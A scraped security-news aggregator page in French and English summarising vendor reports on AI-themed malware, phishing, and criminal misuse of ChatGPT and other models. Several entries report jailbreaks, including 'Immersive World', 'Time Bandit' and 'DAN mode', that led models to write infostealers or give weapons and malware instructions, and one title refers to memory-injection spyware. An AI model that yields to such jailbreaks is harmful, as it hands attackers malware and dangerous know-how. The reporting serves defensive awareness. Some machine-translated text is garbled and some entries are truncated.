What's new arround internet

Last one

Src Date (GMT) Titre Description Tags Stories Notes
SecureMac.webp 2025-03-21 21:49:05 Liste de contrôle 416: logiciels malveillants comme A.I. et A.I. Être trippin \\ '
Checklist 416: Malware as A.I. and A.I. Be Trippin\\'
(lien direct)
> Les problèmes de précision d'Ai \\ étimulent une action en justice car Chatgpt accuse faussement les utilisateurs de crimes, tandis que les escroqueries en logiciels malveillants Deepseek mettent la confidentialité et la sécurité en danger.
>AI\'s accuracy issues spark legal action as ChatGPT falsely accuses users of crimes, while DeepSeek malware scams put privacy and security at risk.
Malware ChatGPT ★★
Blog.webp 2025-03-19 15:58:16 Les chercheurs utilisent l'IA jailbreak sur les LLMS pour créer un infostealer Chrome
Researchers Use AI Jailbreak on Top LLMs to Create Chrome Infostealer
(lien direct)
New Immersive World LLM Jailbreak permet à quiconque de créer des logiciels malveillants avec Genai. Découvrez comment les chercheurs de Cato Networks ont trompé Chatgpt, Copilot et Deepseek dans le codage des infostelleurs - dans ce cas, un infostealer chromé.
New Immersive World LLM jailbreak lets anyone create malware with GenAI. Discover how Cato Networks researchers tricked ChatGPT, Copilot, and DeepSeek into coding infostealers - In this case, a Chrome infostealer.
Malware ChatGPT ★★★
ProofPoint.webp 2025-02-25 02:00:04 Arrêt de cybersécurité du mois: Capital One Credential Phishing-How Les cybercriminels ciblent votre sécurité financière
Cybersecurity Stop of the Month: Capital One Credential Phishing-How Cybercriminals Are Targeting Your Financial Security
(lien direct)
La série de blogs sur l'arrêt de la cybersécurité explore les tactiques en constante évolution des cybercriminels d'aujourd'hui et comment Proofpoint aide les organisations à mieux fortifier leurs défenses par e-mail pour protéger les gens contre les menaces émergentes d'aujourd'hui. Les cybercriminels continuent d'affiner leurs campagnes de phishing avec des technologies en évolution et des tactiques psychologiques. Souvent, les campagnes imitent les organisations de confiance, en utilisant des e-mails bidon et des sites Web qui semblent presque identiques à leurs homologues légitimes. Selon ProofPoint Threat Research, les attaques de phishing ont augmenté de 147% lors de la comparaison du quatrième trimestre 2023 avec le quatrième trimestre 2024. Il y a également eu une augmentation de 33% du phishing livré par les principales plateformes de productivité basées sur le cloud. Ces statistiques alarmantes soulignent comment les menaces de phishing évoluent rapidement. Et des outils d'IA génératifs comme Chatgpt, Deepfakes et les services de clonage vocale font partie de cette tendance. Une campagne de phishing qui a utilisé la marque Capital One est un bon exemple de la sophistication croissante de ces attaques, qui ciblent fréquemment les institutions financières. Dans cet article de blog, nous explorerons comment cette campagne a fonctionné et comment Proofpoint a arrêté la menace. Le scénario Les cybercriminels ont envoyé des e-mails qui semblaient provenant de Capital One. Ils ont utilisé deux principaux types de leurres: Vérification des transactions. Les e-mails ont demandé aux utilisateurs s'ils avaient reconnu un achat récent. Cette tactique est particulièrement efficace pendant la période des fêtes. Notification de paiement. Les e-mails ont informé les utilisateurs qu'ils avaient reçu un nouveau paiement et les ont incité à prendre des mesures pour l'accepter. Les montants de paiement élevé ont créé un sentiment d'urgence. Du 7 décembre 2024 au 12 janvier 2025, cette campagne a ciblé plus de 5 000 clients avec environ 130 000 messages de phishing. Capital One a mis en œuvre de solides mesures de sécurité, notamment l'authentification par e-mail et les retraits des domaines de lookalike. Cependant, les acteurs de la menace continuent de trouver des moyens d'abuser de sa marque dans les campagnes de phishing. Les attaquants exploitent les utilisateurs de la confiance dans les institutions financières, en utilisant des tactiques trompeuses pour contourner les contrôles de sécurité et inciter les utilisateurs sans méfiance à révéler des informations sensibles. La menace: comment l'attaque s'est-elle produite? Voici comment l'attaque s'est déroulée: 1. Réglage du leurre. Les attaquants ont conçu des courriels qui reflétaient étroitement les communications officielles de Capital One. Le logo, l'image de marque et le ton de la société ont tous été copiés. Les messages ont créé un sentiment d'urgence, qui est une tactique souvent utilisée par les acteurs de la menace pour amener les destinataires à prendre des décisions hâtives. Lyer de phishing utilisé par les acteurs de la menace. Les lignes d'objet étaient convaincantes et visaient à attirer rapidement l'attention. Les préoccupations financières, comme les achats non autorisés ou les alertes de paiement, étaient un thème commun pour inciter les utilisateurs à ouvrir l'e-mail et à cliquer sur les liens. Exemples: "Action requise: vous avez reçu un nouveau paiement" "[Nom d'utilisateur], reconnaissez-vous cet achat?" Un autre leurre utilisé par les acteurs de la menace. 2. Abus des services d'URL. Pour contourner le scepticisme des utilisateurs, les attaquants ont exploité leur confiance inhérente aux URL Google. Les URL Google intégrées ont été utilisées comme mécanismes de redirection, reliant les destinataires aux sites Web de phishing. Ces sites Web ont été conçus pour sembler identiques à la page de connexion légitime de Capital One. S Malware Tool Threat Prediction Medical Cloud Commercial ChatGPT ★★★
CyberSkills.webp 2025-02-17 00:00:00 The Growing Threat of Phishing Attacks and How to Protect Yourself (lien direct) Phishing remains the most common type of cybercrime, evolving into a sophisticated threat that preys on human psychology and advanced technology. Traditional phishing involves attackers sending fake, malicious links disguised as legitimate messages to trick victims into revealing sensitive information or installing malware. However, phishing attacks have become increasingly advanced, introducing what experts call "phishing 2.0" and psychological phishing.  Phishing 2.0 leverages AI to analyse publicly available data, such as social media profiles and public records, to craft highly personalized and convincing messages. These tailored attacks significantly increase the likelihood of success. Psychological manipulation also plays a role in phishing schemes. Attackers exploit emotions like fear and trust, often creating a sense of urgency to pressure victims into acting impulsively. By impersonating trusted entities, such as banks or employers, they pressure victims into following instructions without hesitation.  AI has further amplified the efficiency and scale of phishing attacks. Cybercriminals use AI tools to generate convincing scam messages rapidly, launch automated campaigns and target thousands of individuals within minutes. Tools like ChatGPT, when misused in “DAN mode”, can bypass ethical restrictions to craft grammatically correct and compelling messages, aiding attackers who lack English fluency.  These cutting-edge threats combine the precision of AI-driven tools with the effectiveness of psychological manipulation, making phishing more dangerous than ever for individuals and organizations.  To combat these advanced threats, organizations must adopt a proactive defence strategy. They must begin by enhancing cybersecurity awareness through regular training sessions, equipping employees to recognize phishing attempts. They should implement advanced email filtering systems that use AI to detect even the most sophisticated phishing emails. They can strengthen security with multi-factor authentication (MFA), requiring multiple verification steps to protect sensitive accounts. By conducting regular security assessments, they can identify and mitigate vulnerabilities. Finally, by establishing a robust incident response plan to ensure swift and effective action when phishing incidents occur.  Cyber Skills can help you to upskill your team and prevent your organisation from falling victims to these advanced phishing attacks. With 80% government funding available for all Cyber Skills microcredentials, there is no better time to upskill. Apply today www.cyberskills.ie
Phishing remains the most common type of cybercrime, evolving into a sophisticated threat that preys on human psychology and advanced technology. Traditional phishing involves attackers sending fake, malicious links disguised as legitimate messages to trick victims into revealing sensitive information or installing malware. However, phishing attacks have become increasingly advanced, introducing what experts call "phishing 2.0" and psychological phishing.  Phishing 2.0 leverages AI to analyse publicly available data, such as social media profiles and public records, to craft highly personalized and convincing messages. These tailored attacks significantly increase the likelihood of success. Psychological manipulation also plays a role in phishing schemes. Attackers exploit emotions like fear and trust, often creating a sense of urgency to pressure victims into acting impulsively. By impersonating trusted entities, such as banks or employers, they pressure victims into following instructions without hesitation.  AI has further amplified the efficiency and scale of phishing attacks. Cybercriminals use AI tools to generate convincing scam messages rapidly, launch automated campaigns and target thousands of individuals within minutes. Tools like ChatGPT, when misused in “DAN mode”, can bypass ethical restrictions to craft grammatically correct and compelling messages, aiding attackers who lack English fluency. 
Malware Tool Vulnerability Threat ChatGPT ★★★
Checkpoint.webp 2025-02-04 17:38:54 CPR Finds Threat Actors Already Leveraging DeepSeek and Qwen to Develop Malicious Content (lien direct) >Soon after the launch of AI models DeepSeek and Qwen, Check Point Research witnessed cyber criminals quickly shifting from ChatGPT to these new platforms to develop malicious content. Threat actors are sharing how to manipulate the models and show uncensored content, ultimately allowing hackers and criminals to use AI to create malicious content. Called jailbreaking, there are many methods to remove censors from AI models. However, we now see in-depth guides to jailbreaking methods, bypassing anti-fraud protections, and developing malware itself. This blog delves into how threat actors leverage these advanced models to develop harmful content, manipulate AI functionalities through […]
>Soon after the launch of AI models DeepSeek and Qwen, Check Point Research witnessed cyber criminals quickly shifting from ChatGPT to these new platforms to develop malicious content. Threat actors are sharing how to manipulate the models and show uncensored content, ultimately allowing hackers and criminals to use AI to create malicious content. Called jailbreaking, there are many methods to remove censors from AI models. However, we now see in-depth guides to jailbreaking methods, bypassing anti-fraud protections, and developing malware itself. This blog delves into how threat actors leverage these advanced models to develop harmful content, manipulate AI functionalities through […]
Malware Threat ChatGPT ★★★
Cyble.webp 2025-01-30 13:00:34 DeepSeek\'s Growing Influence Sparks a Surge in Frauds and Phishing Attacks (lien direct) DeepSeek Fraud Overview DeepSeek is a Chinese artificial intelligence company that has developed open-source large language models (LLMs). In January 2025, DeepSeek launched its first free chatbot app, “DeepSeek - AI Assistant”, which rapidly became the most downloaded free app on the iOS App Store in the United States, surpassing even OpenAI\'s ChatGPT. However, with rapid growth comes new risks-cybercriminals are exploiting DeepSeek\'s reputation through phishing campaigns, fake investment scams, and malware disguised as DeepSeek. This analysis seeks to explore recent incidents where Threat Actors (TAs) have impersonated DeepSeek to target users, highlighting their tactics and how readers can secure themselves accordingly. Recently, Cyble Research and Intelligence Labs (CRIL) identified multiple suspicious websites impersonating DeepSeek. Many of these sites were linked to crypto phishing schemes and fraudulent investment scams. We have compiled a list of the identified suspicious sites: abs-register[.]com deep-whitelist[.]com deepseek-ai[.]cloud deepseek[.]boats deepseek-shares[.]com deepseek-aiassistant[.]com usadeepseek[.]com Campaign Details Crypto phishing leveraging the popularity of DeepSeek CRIL uncovered a crypto phishin Spam Malware Threat Mobile ChatGPT ★★★
bleepingcomputer.webp 2025-01-30 07:00:00 Time Bandit ChatGPT jailbreak bypasses safeguards on sensitive topics (lien direct) A ChatGPT jailbreak flaw, dubbed "Time Bandit," allows you to bypass OpenAI\'s safety guidelines when asking for detailed instructions on sensitive topics, including the creation of weapons, information on nuclear topics, and malware creation. [...]
A ChatGPT jailbreak flaw, dubbed "Time Bandit," allows you to bypass OpenAI\'s safety guidelines when asking for detailed instructions on sensitive topics, including the creation of weapons, information on nuclear topics, and malware creation. [...]
Malware ChatGPT ★★★
ProofPoint.webp 2025-01-24 05:28:30 Unlocking the Value of AI: Safe AI Adoption for Cybersecurity Professionals (lien direct) As a cybersecurity professional or CISO, you likely find yourself in a rapidly evolving landscape where the adoption of AI is both a game changer and a challenge. In a recent webinar, I had an opportunity to delve into how organizations can align AI adoption with business objectives while safeguarding security and brand integrity. Michelle Drolet, CEO of Towerwall, Inc., hosted the discussion. And Diana Kelley, CISO at Protect AI, participated with me. What follows are some key takeaways. I believe every CISO and cybersecurity professionals should consider them when they are integrating AI into their organization. Start with gaining visibility into AI usage The first and most critical step is gaining visibility into how AI is being used across your organization. Whether it\'s generative AI tools like ChatGPT or custom predictive models, it\'s essential to understand where and how these technologies are deployed. After all, you cannot protect what you cannot see. Start by identifying all large language models (LLMs) and the AI tools that are being used. Then map out the data flows that are associated with them. Balance innovation with guardrails AI adoption is inevitable. The “hammer approach” of banning its use outright rarely works. Instead, create tailored policies that balance innovation with security. For instance: Define policies that specify what types of data can interact with AI tools Implement enforcement mechanisms to prevent sensitive data from being shared inadvertently These measures empower employees to use AI\'s capabilities while ensuring that robust security protocols are maintained. Educate your employees One of the biggest challenges in AI adoption is ensuring that employees understand the risks and responsibilities that are involved. Traditional security awareness programs that focus on phishing or malware need to evolve to include AI-specific training. Employees must be equipped to: Recognize the risks of sharing sensitive data with AI Create clear policies for complex techniques like data anonymization to prevent inadvertent exposure of sensitive data Appreciate why it\'s important to follow organizational policies Conduct proactive threat modeling AI introduces unique risks, such as accidental data leakage. Another risk is “confused pilot” attacks where AI systems inadvertently expose sensitive data. Conduct thorough threat modeling for each AI use case: Map out architecture and data flows Identify potential vulnerabilities in training data, prompts and responses Implement scanning and monitoring tools to observe interactions with AI systems Use modern tools like DSPM Data Security Posture Management (DSPM) is an invaluable framework for securing AI. By providing visibility into data types, access patterns and risk exposure, DSPM enables organizations to: Identify sensitive data being used for AI training or inference Monitor and control who has access to critical data Ensure compliance with data governance policies Test before you deploy AI is nondeterministic by nature. This means that its behavior can vary unpredictably. Before deploying AI tools, conduct rigorous testing: Red team your AI systems to uncover potential vulnerabilities Use AI-specific testing tools to simulate real-world scenarios Establish observability layers to monitor AI interactions post-deployment Collaborate across departments Effective AI security requires cross-departmental collaboration. Engage teams from marketing, finance, compliance and beyond to: Understand their AI use cases Identify risks that are specific to their workflows Implement tailored controls that support their objectives while keeping the organization safe Final thoughts By focusing on visibility, education and proactive security measures, we can harness AI\'s potential while minimizing risks. If there\'s one piece of advice that I\'d leave you with, it\'s this: Don\'t wait for incidents to highlight the gaps in your AI strategy. Take the first step now by auditing Malware Tool Vulnerability Threat Legislation ChatGPT ★★
Korben.webp 2024-11-25 11:35:11 Attention aux lib ChatGPT / Claude piégées par un malware (lien direct) Vous pensiez gagner du temps en intégrant ChatGPT à vos projets via une API gratuite trouvée sur PyPI ? Attention, ce raccourci pourrait vous coûter très cher car des petits malins ont eu la brillante idée de surfer sur la vague de l’IA générative pour piéger les développeurs pressés avec un logiciel malveillant. En effet, pendant plus d’un an, deux packages Python se sont fait passer pour des API officielles de ChatGPT et Claude sur le dépôt PyPI. Ces petits fourbes promettaient monts et merveilles, notamment un accès gratuit aux modèles les plus avancés comme GPT-4 Turbo. De quoi faire saliver plus d’un développeur à la recherche de petites économies, surtout que d’ordinaire, ces services sont payants.
Vous pensiez gagner du temps en intégrant ChatGPT à vos projets via une API gratuite trouvée sur PyPI ? Attention, ce raccourci pourrait vous coûter très cher car des petits malins ont eu la brillante idée de surfer sur la vague de l’IA générative pour piéger les développeurs pressés avec un logiciel malveillant. En effet, pendant plus d’un an, deux packages Python se sont fait passer pour des API officielles de ChatGPT et Claude sur le dépôt PyPI. Ces petits fourbes promettaient monts et merveilles, notamment un accès gratuit aux modèles les plus avancés comme GPT-4 Turbo. De quoi faire saliver plus d’un développeur à la recherche de petites économies, surtout que d’ordinaire, ces services sont payants.
Malware ChatGPT ★★
ProofPoint.webp 2024-11-18 10:34:05 Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape (lien direct) What happened  Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever.  Initially observed earlier this year in campaigns from initial access broker TA571 and a fake update website compromise threat cluster known as ClearFake, the ClickFix technique that attempts to lure unsuspecting users to copy and run PowerShell to download malware is now much more popular across the threat landscape.   The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer.  Example of early ClickFix technique used by ClearFake.   Proofpoint has observed threat actors impersonating various software and services using the ClickFix technique as part of their social engineering, including common enterprise software such as Microsoft Word and Google Chrome, as well as software specifically observed in target environments such as transportation and logistics.  The ClickFix technique is used by multiple different threat actors and can originate via compromised websites, documents, HTML attachments, malicious URLs, etc. In most cases, when directed to the malicious URL or file, users are shown a dialog box that suggests an error occurred when trying to open a document or webpage. This dialog box includes instructions that appear to describe how to “fix” the problem, but will either: automatically copy and paste a malicious script into the PowerShell terminal, or the Windows Run dialog box, to eventually run a malicious script via PowerShell; or provide a user with instructions on how to manually open PowerShell and copy and paste the provided command.  Proofpoint has observed ClickFix campaigns leading to malware including AsyncRAT, Danabot, DarkGate, Lumma Stealer, NetSupport, and more.   ClickFix campaigns observed March through October 2024.   Notably, threat actors have been observed recently using a fake CAPTCHA themed ClickFix technique that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check.  Much of the activity is based on an open source toolkit named reCAPTCHA Phish available on GitHub for “educational purposes.” The tool was released in mid-September by a security researcher, and Proofpoint began observing it in email threat data just days later. The purpose of the repository was to demonstrate a similar technique used by threat actors since August 2024 on websites related to video streaming. Ukraine CERT recently published details on a suspected Russian espionage actor using the fake CAPTCHA ClickFix technique in campaigns targeting government entities in Ukraine.  Recent examples  GitHub “Security Vulnerability” notifications   On 18 September 2024, Proofpoint researchers identified a campaign using GitHub notifications to deliver malware. The messages were notifications for GitHub activity. The threat actor either commented on or created an issue in a GitHub repository. If the repository owner, issue owner, or other relevant collaborators had email notifications enabled, they received an email notification containing the content of the comment or issue from GitHub. This campaign was publicly reported by security journalist Brian Krebs.   Email from GitHub.  The notification impersonated a security warning from GitHub and included a link to a fake GitHub website. The fake website used the reCAPTCHA Phish and ClickFix social engineering technique to trick users into executing a PowerShell command on their computer.    ClickFix style “verification steps” to execute PowerShell.  The landing page contained a fake reCAPTCHA message at the end of the copied command so the target would not see the actual malicious command in the run-box when the malicious command was pasted. If the user performed the requested steps, PowerShell code was execu Malware Tool Threat ChatGPT ★★
RiskIQ.webp 2024-10-21 18:57:24 Bumblebee malware returns after recent law enforcement disruption (lien direct) ## Instantané Les chercheurs de la société de cybersécurité Nettskope ont observé une résurgence du chargeur de logiciels malveillants de Bumblebee, qui s'était silencieux à la suite de la perturbation par Europol \\ 's \' Operation Endgame \\ 'en mai. ## Description Bumblebee, attribué à [TrickBot] (https://sip.security.microsoft.com/intel-profiles/5a0aed1313768d50c9e800748108f51d3dfea6a4b48aa71b630cff897982f7c) https://sip.security.microsoft.COM / Intel-Explorer / Articles / 8AAA95D1) Backdoor, facilitant les acteurs de ransomwares \\ 'Accès aux réseaux.Le malware est généralement réparti par le phishing, le malvertising et l'empoisonnement SEO, promouvant des logiciels contrefaits comme Zooom, Cisco AnyConnect, Chatgpt et Citrix Workspace.Il est connu pour la livraison de charges utiles telles que [Cobalt Strike] (https: //sip.security.microsoft.com/intel-profiles/fd8511c1d61e93d39411acf36a31130a6795efe186497098fe0c6f2ccfb920fc) Beacons, [standing 2575F9418D4B6723C17B8A1F507D20C2140A75D16D6) MALWARE et diverses souches de ransomware.  La dernière chaîne d'attaque de Bumblebee commence par un phiShing Email qui trompe la victime pour télécharger une archive zip malveillante contenant un raccourci .lnk.Ce raccourci déclenche PowerShell pour télécharger un fichier .msi malveillant, se faisant passer pour une mise à jour légitime du pilote NVIDIA ou un programme d'installation de MidJourney, à partir d'un serveur distant.Le fichier .msi s'exécute silencieusement, en utilisant la table Self-Reg pour charger une DLL dans le processus msiexec.exe et déployer Bumblebee en mémoire.La charge utile dispose d'une DLL interne, de fonctions de noms de fonctions exportées et de mécanismes d'extraction de configuration cohérents avec les variantes précédentes. ## Analyse Microsoft et contexte OSINT supplémentaire L'acteur Microsoft suit [Storm-0249] (https://sip.security.microsoft.com/intel-profiles/75f82d0d2bf6af59682bbbbbbbb. et connu pour distribution de bazaloder, Gozi, emoTET, [IceDID] (https://sip.security.microsoft.com/intel-profiles/ee69395aeeea2b2322d5941be0ec4997a22d106f671ef84d35418ec2810faddb) et bumBlebee.Storm-0249 utilise généralement des e-mails de phishing pour distribuer leurs charges utiles de logiciels malveillants dans des attaques opportunistes.En mai 2022, Microsoft Threat Intelligence a observé que Storm-0249 s'éloigne de la précédente MALWLes familles de [Bumblebee] (https://security.microsoft.com/atheatanalytics3/048e866a-0a92-47b8-94ac-c47fe577cc33/analystreport?ocid=Magicti_TA_TA2) comme mécanisme initial de livraison de charge utile.Ils ont effectué des campagnes d'accès initiales basées sur des e-mails pour un transfert à d'autres acteurs, notamment pour les campagnes qui ont abouti au déploiement des ransomwares.   Bumblebee Malware a fait plusieurs résurgences depuis sa découverte en 2022, adaptant et évoluant en réponse aux mesures de sécurité.Initialement observé en remplacement des logiciels malveillants bazarloader utilisés par les groupes cybercriminaux liés à TrickBot, Bumblebee a refait surface plusieurs fois avec des capacités améliorées et des stratégies d'attaque modifiées.Ces [résurgences] (https://sip.security.microsoft.com/intel-explorer/articles/ab2bde0b) coïncident souvent avec les changements dans l'écosystème de cybercriminalité, y compris le retrait de l'infrastructure de TrickBot \\ et de la puissance de conti ransomware de TrickBot \\ s et de la puissance de conti ransomware de TrickBot \\ s et de la puissance de contidrowware Contidownopérations. La capacité de Bumblebee \\ à réapparaître est due à son architecture modulaire flexible, permettant aux acteurs de menace de mettre à jour ses charges utiles et ses techniques d'évasion.Chaque résurgence a vu Bumblebee utilisé dans des campagnes de plus en plus sophistiquées, offrant fréquemment des ransomwares à fort impact comme BlackCat et Quantum.De plus, il a été lié à des tactiques d'évasion avancées Ransomware Spam Malware Tool Threat Legislation ChatGPT ★★
RiskIQ.webp 2024-10-16 19:15:03 Une mise à jour sur la perturbation des utilisations trompeuses de l'IA
An update on disrupting deceptive uses of AI
(lien direct)
## Instantané OpenAI a identifié et perturbé plus de 20 cas où ses modèles d'IA ont été utilisés par des acteurs malveillants pour diverses opérations de cyber, notamment le développement de logiciels malveillants, les réseaux de désinformation, l'évasion de détection et les attaques de phishing de lance. ## Description Dans son rapport nouvellement publié, OpenAI met en évidence les tendances des activités des acteurs de la menace, notant qu'ils tirent parti de l'IA lors d'une phase intermédiaire spécifique acquérant des outils de base mais avant de déployer des produits finis.Le rapport révèle également que si ces acteurs expérimentent activement des modèles d'IA, ils n'ont pas encore atteint des percées importantes dans la création de logiciels malveillants considérablement nouveaux ou de construire un public viral.De plus, le rapport souligne que les entreprises d'IA elles-mêmes deviennent des objectifs d'activité malveillante. OpenAI a identifié et perturbé quatre réseaux distincts impliqués dans la production de contenu lié aux élections.Il s'agit notamment d'une opération d'influence iranienne secrète (IO) responsable de la création d'une variété de matériaux, tels que des articles à long terme sur les élections américaines, ainsi que des utilisateurs rwandais de CHATGPT générant du contenu lié aux élections pour le Rwanda, qui a ensuite été publié par des comptesSur X. Selon Openai, la capacité de ces campagnes à avoir un impact significatif et à atteindre un grand public en ligne était limitée. OpenAI a également publié des études de cas sur plusieurs cyber-acteurs utilisant des modèles d'IA.Il s'agit notamment de Storm-0817, qui a utilisé l'IA pour le débogage du code, et SweetSpecter, qui a exploité les services d'Openai \\ pour la reconnaissance, la recherche sur la vulnérabilité, le soutien des scripts, l'évasion de détection d'anomalie et le développement.De plus, [cyberav3ngers] (https://www.microsoft.com/en-us/security/blog/2024/05/30/exposed-and-vulnerable-recent-attacks-highlight-critical-need-to-protect-Internet-OT-Devices /? MSOCKID = 11175395187C6B993D06473919876A3B) a mené des recherches sur des contrôleurs logiques programmables, tandis que les IOS se sont dirigés par des acteurs de Russie, des États-Unis, de l'Iran et de Rwanda, entre autres. ## Analyse Microsoft et contexte OSINT supplémentaire Plus tôt cette année, Microsoft, en collaboration avec OpenAI, [a publié un rapport] (https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-thereat-acteurs-dans l'âge d'ai /) détaillant les menaces émergentes à l'ère de l'IA, en se concentrant sur l'activité identifiée associée à des acteurs de menace connus, y compris les injections rapides, l'utilisation abusive de modèles de gros langues (LLM) et la fraude.Bien que différents acteurs de menace \\ 'et la complexité varient, ils ont des tâches communes à effectuer au cours du ciblage et des attaques.Il s'agit notamment de la reconnaissance, telles que l'apprentissage des victimes potentielles \\ 'industries, des lieux et des relations;Aide au codage, notamment en améliorant des choses comme les scripts logiciels et le développement de logiciels malveillants;et l'aide à l'apprentissage et à l'utilisation de la langue maternelle.Les acteurs Microsoft suit comme [Forest Blizzard] (https: // security.microsoft.com/intel-profiles/dd75f93b2a771c9510dceec817b9d34d868c2d1353d08c8c1647de067270fdf8), [emerald. FB337DC703EE4ED596D8AE16F942F442B895752AD9F41DD58E), [Crimson Sandstorm] (https://security.microsoft.com/Intel-Profiles / 34E4ACFE2868D450AC93C5C3E6D2DF021E2801BDB3700DD8F172D602DF6DA046), [Charcoal Tyhpoon] (https://security.microsoft.com/intel-profiles/aabd105e7b5d4d4d.10e.1 BD49A6D3DB3D52D0495410EFD39D506AAD9A4) et [Salmon Typhoon] (https://security.microsoft.com 1C08B4B6) étaient oBServed menant cette activité. Le Centre d'analyse des menaces de Microsoft (MTAC) a suivi les acteurs de la menace \ Malware Tool Vulnerability Threat Studies ChatGPT ★★
no_ico.webp 2024-10-14 07:12:01 Openai dit que les mauvais acteurs utilisent le chatppt pour écrire des logiciels malveillants, les élections influencées
OpenAI says bad actors are using ChatGPT to write malware, sway elections
(lien direct)
Les cybercriminels exploitent de plus en plus le modèle d'Openai \\, pour effectuer une gamme d'activités malveillantes, notamment le développement de logiciels malveillants, les campagnes de désinformation et le phisseur de lance.Un nouveau rapport a révélé que depuis le début de 2024, OpenAI a perturbé plus de 20 opérations trompeuses dans le monde, mettant en lumière une tendance troublante de l'abus de l'IA qui comprend la création et le débogage de logiciels malveillants, la production de contenu [...]
Cybercriminals are increasingly exploiting OpenAI\'s model, ChatGPT, to carry out a range of malicious activities, including malware development, misinformation campaigns, and spear-phishing. A new report revealed that since the beginning of 2024, OpenAI has disrupted over 20 deceptive operations worldwide, spotlighting a troubling trend of AI misuse that includes creating and debugging malware, producing content [...]
Malware Prediction ChatGPT ★★★
bleepingcomputer.webp 2024-10-12 10:09:19 OpenAI confirme les acteurs de la menace utilisent le chatppt pour écrire des logiciels malveillants
OpenAI confirms threat actors use ChatGPT to write malware
(lien direct)
Openai a perturbé plus de 20 cyber-opérations malveillantes abusant de son chatbot alimenté par l'IA, du chatppt, de son débogage et du développement de logiciels malveillants, de la diffusion de désinformation, de l'évitement de la détection et de la réalisation d'attaques de pli-pics de lance.[...]
OpenAI has disrupted over 20 malicious cyber operations abusing its AI-powered chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and conducting spear-phishing attacks. [...]
Malware Threat ChatGPT ★★
CS.webp 2024-10-09 19:25:56 Openai dit qu'il a perturbé plus de 20 réseaux d'influence étrangère au cours de l'année écoulée
OpenAI says it has disrupted 20-plus foreign influence networks in past year
(lien direct)
> Les acteurs de la menace ont été observés à l'aide de Chatgpt et d'autres outils pour étendre les surfaces d'attaque, déboguer les logiciels malveillants et créer du contenu de spectre.
>Threat actors were observed using ChatGPT and other tools to scope out attack surfaces, debug malware and create spearphishing content.
Malware Tool ChatGPT ★★★
RiskIQ.webp 2024-09-30 13:21:55 Faits saillants hebdomadaires OSINT, 30 septembre 2024
Weekly OSINT Highlights, 30 September 2024
(lien direct)
## Snapshot Last week\'s OSINT reporting highlighted diverse cyber threats involving advanced attack vectors and highly adaptive threat actors. Many reports centered on APT groups like Patchwork, Sparkling Pisces, and Transparent Tribe, which employed tactics such as DLL sideloading, keylogging, and API patching. The attack vectors ranged from phishing emails and malicious LNK files to sophisticated malware disguised as legitimate software like Google Chrome and Microsoft Teams. Threat actors targeted a variety of sectors, with particular focus on government entities in South Asia, organizations in the U.S., and individuals in India. These campaigns underscored the increased targeting of specific industries and regions, revealing the evolving techniques employed by cybercriminals to maintain persistence and evade detection. ## Description 1. [Twelve Group Targets Russian Government Organizations](https://sip.security.microsoft.com/intel-explorer/articles/5fd0ceda): Researchers at Kaspersky identified a threat group called Twelve, targeting Russian government organizations. Their activities appear motivated by hacktivism, utilizing tools such as Cobalt Strike and mimikatz while exfiltrating sensitive information and employing ransomware like LockBit 3.0. Twelve shares infrastructure and tactics with the DARKSTAR ransomware group. 2. [Kryptina Ransomware-as-a-Service Evolution](https://security.microsoft.com/intel-explorer/articles/2a16b748): Kryptina Ransomware-as-a-Service has evolved from a free tool to being actively used in enterprise attacks, particularly under the Mallox ransomware family, which is sometimes referred to as FARGO, XOLLAM, or BOZON. The commoditization of ransomware tools complicates malware tracking as affiliates blend different codebases into new variants, with Mallox operators opportunistically targeting \'timely\' vulnerabilities like MSSQL Server through brute force attacks for initial access. 3. [North Korean IT Workers Targeting Tech Sector:](https://sip.security.microsoft.com/intel-explorer/articles/bc485b8b) Mandiant reports on UNC5267, tracked by Microsoft as Storm-0287, a decentralized threat group of North Korean IT workers sent abroad to secure jobs with Western tech companies. These individuals disguise themselves as foreign nationals to generate revenue for the North Korean regime, aiming to evade sanctions and finance its weapons programs, while also posing significant risks of espionage and system disruption through elevated access. 4. [Necro Trojan Resurgence](https://sip.security.microsoft.com/intel-explorer/articles/00186f0c): Kaspersky\'s Secure List reveals the resurgence of the Necro Trojan, impacting both official and modified versions of popular applications like Spotify and Minecraft, and affecting over 11 million Android devices globally. Utilizing advanced techniques such as steganography to hide its payload, the malware allows attackers to run unauthorized ads, download files, and install additional malware, with recent attacks observed across countries like Russia, Brazil, and Vietnam. 5. [Android Spyware Campaign in South Korea:](https://sip.security.microsoft.com/intel-explorer/articles/e4645053) Cyble Research and Intelligence Labs (CRIL) uncovered a new Android spyware campaign targeting individuals in South Korea since June 2024, which disguises itself as legitimate apps and leverages Amazon AWS S3 buckets for exfiltration. The spyware effectively steals sensitive data such as SMS messages, contacts, images, and videos, while remaining undetected by major antivirus solutions. 6. [New Variant of RomCom Malware:](https://sip.security.microsoft.com/intel-explorer/articles/159819ae) Unit 42 researchers have identified "SnipBot," a new variant of the RomCom malware family, which utilizes advanced obfuscation methods and anti-sandbox techniques. Targeting sectors such as IT services, legal, and agriculture since at least 2022, the malware employs a multi-stage infection chain, and researchers suggest the threat actors\' motives might have s Ransomware Malware Tool Vulnerability Threat Patching Mobile ChatGPT APT 36 ★★
RiskIQ.webp 2024-09-25 22:02:45 Injection de logiciels espions dans la mémoire à long terme de votre chatppt (Spaiware)
Spyware Injection Into Your ChatGPT\\'s Long-Term Memory (SpAIware)
(lien direct)
